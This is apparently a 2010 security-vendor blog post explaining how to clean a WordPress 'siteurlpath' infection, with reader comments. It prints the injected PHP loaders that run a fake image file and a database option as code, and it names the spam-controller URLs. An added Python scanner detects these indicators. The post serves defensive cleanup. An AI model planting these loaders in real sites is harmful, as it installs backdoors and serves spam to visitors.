Cleaning the “siteurlpath” hack on WordPress (wplinksforwork and hemoviestube spam bots)

August 4, 2010, by David Dede

Recently we started to see a lot of WordPress sites hacked with malware hidden in the database, inside the siteurlpath row of the wp_options table. The symptoms are very similar to the pharma hack (lots of SPAM hidden in the site), but in this case the SPAM is displayed to all users, not only to search engines.

This is how an affected site looks on our scanner:

Plus, all the infected sites receive “orders” (the spam links to display) from two sites: http://wplinksforwork.com and http://hemoviestube.com. More details about that later.

To get started cleaning your site, you first have to make sure WordPress is updated. If it is not, go ahead and update it before doing anything else.

Cleaning up the file system

The first place you have to clean is the file system. On all the sites we’ve cleaned so far, the malware was hidden in three files: header.php, functions.php and a randomly named image file (void.jpg, test.jpg, lol.jpg, etc.). All of them sit inside your theme’s directory.

Inside the header.php, they added the following code:

<?php $wp__theme_icon=create_function('',file_get_contents('/path/wp-content/themes/themename/images/void.jpg'));$wp__theme_icon(); ?>

So it basically reads the contents of void.jpg (which is not really an image, but a heavily encoded PHP backdoor) and executes it as PHP code.


Inside functions.php, at the very bottom, the following code was added to load the siteurlpath option from the database, where the spam itself is hidden:

if(!isset($siteurlpath) && @get_option('siteurlpath')){
    $siteurlpath=create_function('',(get_option('siteurlpath')));
    $siteurlpath();
}

So removing these three files should clean the file system of this kind of hack.

Cleaning up the database

Run the following query to see if your database is infected:

> select * from wp_options where option_name = 'siteurlpath';

If you see a large spill of PHP code in there, it means the database is infected (siteurlpath is not a stock WordPress option, so it should not exist at all on a clean site).
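As an added example (not part of the original post and not Sucuri's own tooling), here is a small Python scanner for exactly the indicators described above: theme PHP files that call create_function('', ...) or load the siteurlpath option, image files that actually contain PHP, and a helper to judge a siteurlpath option_value pulled from wp_options. The theme layout, file contents and regexes in demo() are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the injected code shown in this post (hypothetical scanner, not Sucuri's tool)
OPTION_RE = re.compile(r"get_option\s*\(\s*['\"]siteurlpath['\"]\s*\)")   # loads spam from wp_options
LOADER_RE = re.compile(r"create_function\s*\(\s*(['\"])\1\s*,")           # create_function('', <code>)
PHP_IN_IMAGE_RE = re.compile(rb"<\?php|\beval\s*\(|create_function\s*\(|base64_decode\s*\(")
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}

def scan_theme(theme_dir):
    """Walk a theme directory; return sorted (relative path, reason) pairs for suspicious files."""
    root = Path(theme_dir)
    hits = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        data = path.read_bytes()
        rel = path.relative_to(root).as_posix()
        if path.suffix.lower() == ".php":
            text = data.decode("utf-8", "replace")
            if OPTION_RE.search(text):
                hits.append((rel, "reads siteurlpath option"))
            elif LOADER_RE.search(text):
                hits.append((rel, "create_function loader"))
        elif path.suffix.lower() in IMAGE_EXT and PHP_IN_IMAGE_RE.search(data):
            hits.append((rel, "image file containing PHP"))
    return hits

def option_looks_infected(option_value):
    """siteurlpath is not a stock WordPress option; PHP code in its value means the database is infected."""
    if not option_value:
        return False
    return bool(re.search(r"\$\w+\s*=|eval\s*\(|base64_decode\s*\(|gzinflate\s*\(", option_value))

def demo():
    """Build a constructed sample theme (not a real infected site) in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "themename"
        (theme / "images").mkdir(parents=True)
        (theme / "style.css").write_text("/* Theme Name: Clean */\n")
        (theme / "header.php").write_text(  # loader as described in the post
            "<?php $wp__theme_icon=create_function('',file_get_contents("
            "'/path/wp-content/themes/themename/images/void.jpg'));$wp__theme_icon(); ?>\n")
        (theme / "functions.php").write_text(
            "<?php\nif(!isset($siteurlpath)&& @get_option('siteurlpath')){\n"
            "$siteurlpath=create_function('',(get_option('siteurlpath')));\n$siteurlpath();\n}\n")
        (theme / "images" / "logo.gif").write_bytes(b"GIF89a" + b"\x00" * 16)      # genuine image header
        (theme / "images" / "void.jpg").write_bytes(b"<?php eval(base64_decode('...')); ?>")  # fake image
        return scan_theme(theme)
```

Point scan_theme() at a real wp-content/themes/<theme> directory and feed the result of the select query above to option_looks_infected() to reproduce both checks from this post.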

This code acts as a backdoor for the attackers and prints the SPAM to everyone else; the backdoor portion begins with a so-called “Magic shell”.

As for the spam, it is loaded from two sites: http://wplinksforwork.com and http://hemoviestube.com. The list is stored as a serialized PHP array:

a:2:{i:0;s:56:"http://wplinksforwork.com/561327853624756347509328/p.php";
i:1;s:54:"http://hemoviestube.com/561327853624756347509328/p.php";}

The code is full of anti-detection tricks and also acts as a PHP bot that infects other sites. Both sites used to manage the SPAM bots resolve to the same IP address, and we recommend that hosting companies block them:

# host hemoviestube.com
hemoviestube.com has address 95.168.177.94
# host wplinksforwork.com
wplinksforwork.com has address 95.168.177.94

You can see the scale of this attack by searching for these two sites on Google. You will find lots of sites showing errors from the moments when they could not reach the spam managers:

Warning: file_get_contents(http://wplinksforwork.com/561327853624756347509328/p.php?
[function.file-get-contents]: failed to …..

We will post more details later about this attack, but this should be enough to clean up the affected sites.


If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security Malware Removal. We can get your sites cleaned up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Categories: Website Malware Infections, WordPress Security
Tags: Hacked Websites, Malware Cleanup, SEO Spam

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Comments

  1. Steven

    August 4, 2010

    G*D Damn It! These hackers, I mean we need to bomb them with predator drones or something this is really getting old.

    FAST

  2. Steven

    August 4, 2010

    Thanks for the heads up. It's appreciated.

  3. Kaliski

    August 6, 2010

    I was thinking of using Blue Host for a WP blog... but now I do not know. Any ideas?

  4. Raven

    January 14, 2012

    I was one of the 50k+ who was hacked. I fixed it by updating to the newest version of WordPress, temporarily switching my theme to a new one, and then switching back. The spammy links seem to be gone, so hopefully this will help those of you dealing with the same problem.
